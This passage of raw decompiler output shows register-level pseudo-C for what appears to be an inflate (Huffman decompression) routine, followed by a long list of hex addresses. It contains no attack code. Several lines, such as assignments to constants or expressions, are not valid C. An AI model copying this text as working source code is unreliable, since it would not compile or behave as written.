												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L160;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L159;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L159;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L152:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L160:
												__edi = 0;
												goto L10;
											} else {
												L156:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L161:
													0 = 1;
													goto L10;
												}
												goto L157;
											}
									}
								}
								L158:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L159:
				_t414 = 0;
				_t417[0x147] =  *(_t419 - 0x40);
				_t417[0x146] = _t396;
				( *(_t419 + 8))[1] = 0;
				goto L11;
			}









                                                                                        0x00406a9b
                                                                                        0x00406a9b
                                                                                        0x00406a9b
                                                                                        0x00406a9b
                                                                                        0x00406a9b
                                                                                        0x00406a9f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406aa5
                                                                                        0x00406aa5
                                                                                        0x00406aa8
                                                                                        0x00406aab
                                                                                        0x00406ab0
                                                                                        0x00406ab2
                                                                                        0x00406ab5
                                                                                        0x00406ab8
                                                                                        0x00406abb
                                                                                        0x00406abb
                                                                                        0x00406abe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ac0
                                                                                        0x00406ac0
                                                                                        0x00406ac3
                                                                                        0x00406ac8
                                                                                        0x00406aca
                                                                                        0x00406acd
                                                                                        0x00406ad3
                                                                                        0x00406832
                                                                                        0x00406832
                                                                                        0x00406835
                                                                                        0x0040683b
                                                                                        0x00406841
                                                                                        0x0040684a
                                                                                        0x00406850
                                                                                        0x00406853
                                                                                        0x0040685a
                                                                                        0x0040685f
                                                                                        0x00406865
                                                                                        0x00406870
                                                                                        0x00406870
                                                                                        0x00406ad9
                                                                                        0x00406ad9
                                                                                        0x00406ae3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ae9
                                                                                        0x00406ae9
                                                                                        0x00406aed
                                                                                        0x00406af0
                                                                                        0x00406af0
                                                                                        0x00406af4
                                                                                        0x00406afa
                                                                                        0x00406afa
                                                                                        0x00406afd
                                                                                        0x00406b00
                                                                                        0x00406b06
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406b08
                                                                                        0x00406b2a
                                                                                        0x00406b2a
                                                                                        0x00406b2d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406b0a
                                                                                        0x00406b0e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406b14
                                                                                        0x00406b14
                                                                                        0x00406b17
                                                                                        0x00406b1a
                                                                                        0x00406b1f
                                                                                        0x00406b21
                                                                                        0x00406b24
                                                                                        0x00406b27
                                                                                        0x00406b27
                                                                                        0x00406b2f
                                                                                        0x00406b2f
                                                                                        0x00406b35
                                                                                        0x00406b38
                                                                                        0x00406b3b
                                                                                        0x00406b3b
                                                                                        0x00406b42
                                                                                        0x00406b46
                                                                                        0x00406b4a
                                                                                        0x00406b4d
                                                                                        0x00406b50
                                                                                        0x00406b56
                                                                                        0x00406b5b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406b5d
                                                                                        0x00406b71
                                                                                        0x00406b71
                                                                                        0x00406b75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406b5f
                                                                                        0x00406b62
                                                                                        0x00406b62
                                                                                        0x00406b69
                                                                                        0x00406b6e
                                                                                        0x00406b6e
                                                                                        0x00406b6e
                                                                                        0x00406b77
                                                                                        0x00406b77
                                                                                        0x00406b7a
                                                                                        0x00406b88
                                                                                        0x00406b8e
                                                                                        0x00406b93
                                                                                        0x00406b99
                                                                                        0x00406b9f
                                                                                        0x00406ba5
                                                                                        0x00406bac
                                                                                        0x00406bc0
                                                                                        0x00406bc0
                                                                                        0x0040718f
                                                                                        0x0040718f
                                                                                        0x0040718f
                                                                                        0x00407194
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067cc
                                                                                        0x004067cc
                                                                                        0x00000000
                                                                                        0x00406dc7
                                                                                        0x00406dc7
                                                                                        0x00406dcb
                                                                                        0x00406dce
                                                                                        0x00406dd1
                                                                                        0x00406dd4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406dda
                                                                                        0x00406dda
                                                                                        0x00406dff
                                                                                        0x00406dff
                                                                                        0x00406dff
                                                                                        0x00406e01
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ddf
                                                                                        0x00406ddf
                                                                                        0x00406de3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406de9
                                                                                        0x00406de9
                                                                                        0x00406dec
                                                                                        0x00406def
                                                                                        0x00406df2
                                                                                        0x00406df4
                                                                                        0x00406df6
                                                                                        0x00406df9
                                                                                        0x00406dfc
                                                                                        0x00406dfc
                                                                                        0x00406dfc
                                                                                        0x00406e03
                                                                                        0x00406e03
                                                                                        0x00406e0b
                                                                                        0x00406e0e
                                                                                        0x00406e11
                                                                                        0x00406e14
                                                                                        0x00406e18
                                                                                        0x00406e1b
                                                                                        0x00406e1d
                                                                                        0x00406e20
                                                                                        0x00406e22
                                                                                        0x00406e36
                                                                                        0x00406e36
                                                                                        0x00406e39
                                                                                        0x00406e53
                                                                                        0x00406e53
                                                                                        0x00406e56
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e5c
                                                                                        0x00406e5c
                                                                                        0x00406e5f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e65
                                                                                        0x00406e65
                                                                                        0x00000000
                                                                                        0x00406e65
                                                                                        0x00406e3b
                                                                                        0x00406e3e
                                                                                        0x00406e45
                                                                                        0x00406e48
                                                                                        0x00000000
                                                                                        0x00406e48
                                                                                        0x00406e24
                                                                                        0x00406e28
                                                                                        0x00406e2b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e70
                                                                                        0x00406e70
                                                                                        0x00406e95
                                                                                        0x00406e95
                                                                                        0x00406e95
                                                                                        0x00406e97
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e75
                                                                                        0x00406e75
                                                                                        0x00406e79
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406e7f
                                                                                        0x00406e7f
                                                                                        0x00406e82
                                                                                        0x00406e85
                                                                                        0x00406e88
                                                                                        0x00406e8a
                                                                                        0x00406e8c
                                                                                        0x00406e8f
                                                                                        0x00406e92
                                                                                        0x00406e92
                                                                                        0x00406e92
                                                                                        0x00406e99
                                                                                        0x00406ea1
                                                                                        0x00406ea4
                                                                                        0x00406ea7
                                                                                        0x00406ea9
                                                                                        0x00406eac
                                                                                        0x00406eac
                                                                                        0x00406eae
                                                                                        0x00406eb2
                                                                                        0x00406eb5
                                                                                        0x00406eb8
                                                                                        0x00406ebb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ec1
                                                                                        0x00406ec1
                                                                                        0x00406ee6
                                                                                        0x00406ee6
                                                                                        0x00406ee6
                                                                                        0x00406ee8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ec6
                                                                                        0x00406ec6
                                                                                        0x00406eca
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ed0
                                                                                        0x00406ed0
                                                                                        0x00406ed3
                                                                                        0x00406ed6
                                                                                        0x00406ed9
                                                                                        0x00406edb
                                                                                        0x00406edd
                                                                                        0x00406ee0
                                                                                        0x00406ee3
                                                                                        0x00406ee3
                                                                                        0x00406ee3
                                                                                        0x00406eea
                                                                                        0x00406eea
                                                                                        0x00406ef2
                                                                                        0x00406ef5
                                                                                        0x00406ef8
                                                                                        0x00406efb
                                                                                        0x00406eff
                                                                                        0x00406f02
                                                                                        0x00406f04
                                                                                        0x00406f07
                                                                                        0x00406f0a
                                                                                        0x00406f24
                                                                                        0x00406f24
                                                                                        0x00406f27
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f2d
                                                                                        0x00406f2d
                                                                                        0x00406f30
                                                                                        0x00406f37
                                                                                        0x00000000
                                                                                        0x00406f37
                                                                                        0x00406f0c
                                                                                        0x00406f0f
                                                                                        0x00406f16
                                                                                        0x00406f19
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f3f
                                                                                        0x00406f3f
                                                                                        0x00406f64
                                                                                        0x00406f64
                                                                                        0x00406f64
                                                                                        0x00406f66
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f44
                                                                                        0x00406f44
                                                                                        0x00406f48
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f4e
                                                                                        0x00406f4e
                                                                                        0x00406f51
                                                                                        0x00406f54
                                                                                        0x00406f57
                                                                                        0x00406f59
                                                                                        0x00406f5b
                                                                                        0x00406f5e
                                                                                        0x00406f61
                                                                                        0x00406f61
                                                                                        0x00406f61
                                                                                        0x00406f68
                                                                                        0x00406f70
                                                                                        0x00406f73
                                                                                        0x00406f76
                                                                                        0x00406f78
                                                                                        0x00406f7b
                                                                                        0x00406f7d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406f83
                                                                                        0x00406f83
                                                                                        0x00406f86
                                                                                        0x00406f87
                                                                                        0x00406f88
                                                                                        0x00406f8a
                                                                                        0x00406f8e
                                                                                        0x00000000
                                                                                        0x00407089
                                                                                        0x00407089
                                                                                        0x0040708c
                                                                                        0x0040708f
                                                                                        0x00407091
                                                                                        0x00407128
                                                                                        0x00407128
                                                                                        0x0040712b
                                                                                        0x0040712d
                                                                                        0x0040712e
                                                                                        0x0040712f
                                                                                        0x00407132
                                                                                        0x00000000
                                                                                        0x00407132
                                                                                        0x00407097
                                                                                        0x00407097
                                                                                        0x0040709d
                                                                                        0x0040709f
                                                                                        0x004070c4
                                                                                        0x004070c7
                                                                                        0x004070cd
                                                                                        0x004070d2
                                                                                        0x004070d8
                                                                                        0x004070de
                                                                                        0x004070e0
                                                                                        0x004070e3
                                                                                        0x004070ec
                                                                                        0x004070f2
                                                                                        0x004070f2
                                                                                        0x004070e5
                                                                                        0x004070e7
                                                                                        0x004070e9
                                                                                        0x004070e9
                                                                                        0x004070f4
                                                                                        0x004070fa
                                                                                        0x004070fc
                                                                                        0x004070ff
                                                                                        0x00407101
                                                                                        0x00407107
                                                                                        0x00407109
                                                                                        0x0040710b
                                                                                        0x0040710d
                                                                                        0x0040710f
                                                                                        0x00407112
                                                                                        0x0040711b
                                                                                        0x0040711e
                                                                                        0x0040711e
                                                                                        0x00407114
                                                                                        0x00407114
                                                                                        0x00407117
                                                                                        0x00407117
                                                                                        0x00407112
                                                                                        0x00407109
                                                                                        0x00407120
                                                                                        0x00407122
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407122
                                                                                        0x004070a1
                                                                                        0x004070a1
                                                                                        0x004070a7
                                                                                        0x004070ad
                                                                                        0x004070af
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004070b1
                                                                                        0x004070b1
                                                                                        0x004070b3
                                                                                        0x004070b5
                                                                                        0x004070bc
                                                                                        0x004070bc
                                                                                        0x004070be
                                                                                        0x004070b7
                                                                                        0x004070b7
                                                                                        0x004070b9
                                                                                        0x004070b9
                                                                                        0x004070c0
                                                                                        0x004070c2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040713a
                                                                                        0x0040713a
                                                                                        0x0040713d
                                                                                        0x0040713f
                                                                                        0x00407142
                                                                                        0x00407145
                                                                                        0x00407145
                                                                                        0x00407145
                                                                                        0x00407145
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004067f3
                                                                                        0x004067d7
                                                                                        0x00000000
                                                                                        0x004067dd
                                                                                        0x004067e0
                                                                                        0x004067ea
                                                                                        0x004067ed
                                                                                        0x004067f0
                                                                                        0x00000000
                                                                                        0x004067f0
                                                                                        0x004067d7
                                                                                        0x004067fb
                                                                                        0x004067fe
                                                                                        0x00406802
                                                                                        0x0040680c
                                                                                        0x00406816
                                                                                        0x00406819
                                                                                        0x0040681f
                                                                                        0x00406953
                                                                                        0x00406955
                                                                                        0x0040695b
                                                                                        0x0040695e
                                                                                        0x00406961
                                                                                        0x00000000
                                                                                        0x00406961
                                                                                        0x00406825
                                                                                        0x00406825
                                                                                        0x00406826
                                                                                        0x0040687e
                                                                                        0x0040687e
                                                                                        0x00406885
                                                                                        0x0040692b
                                                                                        0x0040692b
                                                                                        0x00406930
                                                                                        0x00406933
                                                                                        0x00406938
                                                                                        0x0040693b
                                                                                        0x00406940
                                                                                        0x00406943
                                                                                        0x00406948
                                                                                        0x0040694b
                                                                                        0x0040694b
                                                                                        0x00000000
                                                                                        0x0040688b
                                                                                        0x0040688b
                                                                                        0x0040688b
                                                                                        0x0040688b
                                                                                        0x0040688f
                                                                                        0x00406894
                                                                                        0x00406894
                                                                                        0x00406894
                                                                                        0x00406899
                                                                                        0x0040689b
                                                                                        0x0040689d
                                                                                        0x004068a2
                                                                                        0x004068a8
                                                                                        0x004068ad
                                                                                        0x004068af
                                                                                        0x004068af
                                                                                        0x004068a4
                                                                                        0x004068a4
                                                                                        0x004068a4
                                                                                        0x004068a2
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b6
                                                                                        0x004068b9
                                                                                        0x004068b9
                                                                                        0x004068ed
                                                                                        0x004068f2
                                                                                        0x004068f4
                                                                                        0x004068f5
                                                                                        0x004068f7
                                                                                        0x004068f8
                                                                                        0x004068f8
                                                                                        0x004068f8
                                                                                        0x00406920
                                                                                        0x00406925
                                                                                        0x00406925
                                                                                        0x00000000
                                                                                        0x00406925
                                                                                        0x00406885
                                                                                        0x00406828
                                                                                        0x00406828
                                                                                        0x00406829
                                                                                        0x00406873
                                                                                        0x00000000
                                                                                        0x00406873
                                                                                        0x0040682b
                                                                                        0x0040682c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406988
                                                                                        0x00406988
                                                                                        0x00406988
                                                                                        0x0040698b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406968
                                                                                        0x00406968
                                                                                        0x0040696c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406972
                                                                                        0x00406972
                                                                                        0x00406975
                                                                                        0x00406978
                                                                                        0x0040697d
                                                                                        0x0040697f
                                                                                        0x00406982
                                                                                        0x00406985
                                                                                        0x00406985
                                                                                        0x00406985
                                                                                        0x0040698d
                                                                                        0x0040698d
                                                                                        0x00406990
                                                                                        0x00406992
                                                                                        0x00406997
                                                                                        0x0040699a
                                                                                        0x0040699c
                                                                                        0x0040699f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004069a5
                                                                                        0x004069a5
                                                                                        0x004069a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x004069ad
                                                                                        0x004069b1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004069b7
                                                                                        0x004069b7
                                                                                        0x004069ba
                                                                                        0x004069bc
                                                                                        0x00406a5a
                                                                                        0x00406a5a
                                                                                        0x00406a5d
                                                                                        0x00406a5f
                                                                                        0x00406a5f
                                                                                        0x00406a62
                                                                                        0x00406a65
                                                                                        0x00406a67
                                                                                        0x00406a69
                                                                                        0x00406a6b
                                                                                        0x00406a6b
                                                                                        0x00406a74
                                                                                        0x00406a79
                                                                                        0x00406a7c
                                                                                        0x00406a7f
                                                                                        0x00406a82
                                                                                        0x00406a85
                                                                                        0x00406a85
                                                                                        0x00406a85
                                                                                        0x00406a88
                                                                                        0x00406a8e
                                                                                        0x00406a8e
                                                                                        0x00406a94
                                                                                        0x00406a94
                                                                                        0x00406a94
                                                                                        0x00000000
                                                                                        0x00406a88
                                                                                        0x004069c2
                                                                                        0x004069c2
                                                                                        0x004069c8
                                                                                        0x004069cb
                                                                                        0x004069cd
                                                                                        0x004069f8
                                                                                        0x004069fb
                                                                                        0x00406a01
                                                                                        0x00406a06
                                                                                        0x00406a0c
                                                                                        0x00406a12
                                                                                        0x00406a14
                                                                                        0x00406a17
                                                                                        0x00406a20
                                                                                        0x00406a26
                                                                                        0x00406a26
                                                                                        0x00406a19
                                                                                        0x00406a1b
                                                                                        0x00406a1d
                                                                                        0x00406a1d
                                                                                        0x00406a28
                                                                                        0x00406a2e
                                                                                        0x00406a31
                                                                                        0x00406a33
                                                                                        0x00406a35
                                                                                        0x00406a3b
                                                                                        0x00406a3d
                                                                                        0x00406a3f
                                                                                        0x00406a42
                                                                                        0x00406a4b
                                                                                        0x00406a4b
                                                                                        0x00406a4d
                                                                                        0x00406a44
                                                                                        0x00406a44
                                                                                        0x00406a47
                                                                                        0x00406a47
                                                                                        0x00406a4f
                                                                                        0x00406a4f
                                                                                        0x00406a3d
                                                                                        0x00406a52
                                                                                        0x00406a54
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406a54
                                                                                        0x004069cf
                                                                                        0x004069cf
                                                                                        0x004069d5
                                                                                        0x004069db
                                                                                        0x004069dd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004069df
                                                                                        0x004069df
                                                                                        0x004069e1
                                                                                        0x004069e3
                                                                                        0x004069e6
                                                                                        0x004069ed
                                                                                        0x004069ed
                                                                                        0x004069ef
                                                                                        0x004069e8
                                                                                        0x004069e8
                                                                                        0x004069ea
                                                                                        0x004069ea
                                                                                        0x004069f1
                                                                                        0x004069f3
                                                                                        0x004069f6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406afa
                                                                                        0x00406afd
                                                                                        0x00406b00
                                                                                        0x00406b06
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406cdd
                                                                                        0x00406cdd
                                                                                        0x00406cdd
                                                                                        0x00406ce0
                                                                                        0x00406ce3
                                                                                        0x00406ce5
                                                                                        0x00406ce8
                                                                                        0x00406cee
                                                                                        0x00406cf5
                                                                                        0x00406cf7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406bcb
                                                                                        0x00406bcb
                                                                                        0x00406bf3
                                                                                        0x00406bf3
                                                                                        0x00406bf3
                                                                                        0x00406bf5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406bd3
                                                                                        0x00406bd3
                                                                                        0x00406bd7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406bdd
                                                                                        0x00406bdd
                                                                                        0x00406be0
                                                                                        0x00406be3
                                                                                        0x00406be6
                                                                                        0x00406be8
                                                                                        0x00406bea
                                                                                        0x00406bed
                                                                                        0x00406bf0
                                                                                        0x00406bf0
                                                                                        0x00406bf0
                                                                                        0x00406bf7
                                                                                        0x00406bf7
                                                                                        0x00406bff
                                                                                        0x00406c02
                                                                                        0x00406c08
                                                                                        0x00406c0b
                                                                                        0x00406c0f
                                                                                        0x00406c13
                                                                                        0x00406c16
                                                                                        0x00406c19
                                                                                        0x00406c31
                                                                                        0x00406c31
                                                                                        0x00406c34
                                                                                        0x00406c42
                                                                                        0x00406c45
                                                                                        0x00406c36
                                                                                        0x00406c36
                                                                                        0x00406c38
                                                                                        0x00406c3f
                                                                                        0x00406c3f
                                                                                        0x00406c6e
                                                                                        0x00406c6e
                                                                                        0x00406c6e
                                                                                        0x00406c71
                                                                                        0x00406c73
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406c4e
                                                                                        0x00406c4e
                                                                                        0x00406c52
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406c58
                                                                                        0x00406c58
                                                                                        0x00406c5b
                                                                                        0x00406c5e
                                                                                        0x00406c61
                                                                                        0x00406c63
                                                                                        0x00406c65
                                                                                        0x00406c68
                                                                                        0x00406c6b
                                                                                        0x00406c6b
                                                                                        0x00406c6b
                                                                                        0x00406c75
                                                                                        0x00406c75
                                                                                        0x00406c77
                                                                                        0x00406c79
                                                                                        0x00406c84
                                                                                        0x00406c87
                                                                                        0x00406c8a
                                                                                        0x00406c8c
                                                                                        0x00406c8e
                                                                                        0x00406c90
                                                                                        0x00406c93
                                                                                        0x00406c96
                                                                                        0x00406c9b
                                                                                        0x00406c9e
                                                                                        0x00406ca1
                                                                                        0x00406ca4
                                                                                        0x00406cab
                                                                                        0x00406cae
                                                                                        0x00406cb0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406cb6
                                                                                        0x00406cb6
                                                                                        0x00406cba
                                                                                        0x00406ccb
                                                                                        0x00406ccb
                                                                                        0x00406ccb
                                                                                        0x00406ccd
                                                                                        0x00406ccd
                                                                                        0x00406cd1
                                                                                        0x00406cd1
                                                                                        0x00406cd1
                                                                                        0x00406cd3
                                                                                        0x00406cd4
                                                                                        0x00406cd7
                                                                                        0x00406cd7
                                                                                        0x00406cd7
                                                                                        0x00406cda
                                                                                        0x00000000
                                                                                        0x00406cda
                                                                                        0x00406cbc
                                                                                        0x00406cbc
                                                                                        0x00406cbf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406cc5
                                                                                        0x00406cc5
                                                                                        0x00000000
                                                                                        0x00406cc5
                                                                                        0x00406c1b
                                                                                        0x00406c1b
                                                                                        0x00406c1d
                                                                                        0x00406c1f
                                                                                        0x00406c22
                                                                                        0x00406c25
                                                                                        0x00406c29
                                                                                        0x00406c29
                                                                                        0x00406cfd
                                                                                        0x00406cfd
                                                                                        0x00406d00
